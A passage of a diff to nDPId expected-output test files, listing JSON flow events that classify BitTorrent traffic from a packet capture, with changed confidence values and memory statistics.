-00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00831{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7580000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7580000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7580000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00830{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7580000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00832{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7580000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":299,"packets-processed":299,"total-skipped-flows":0,"total-l4-payload-len":285982,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":24,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":24,"total-idle-flows":24,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":134,"global_ts_msec":1455469982106} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 299/299 @@ -140,9 +140,9 @@ ~~ total active/idle flows...: 24/24 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6209710 bytes -~~ total memory freed........: 6209710 bytes -~~ total allocations/frees...: 118529/118529 +~~ total memory allocated....: 6343344 bytes +~~ total memory freed........: 6343344 bytes +~~ total allocations/frees...: 121291/121291 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1461 chars diff --git a/test/results/bittorrent_utp.pcap.out b/test/results/bittorrent_utp.pcap.out index 569eae723..278889c90 100644 --- a/test/results/bittorrent_utp.pcap.out +++ b/test/results/bittorrent_utp.pcap.out @@ -2,12 +2,11 @@ 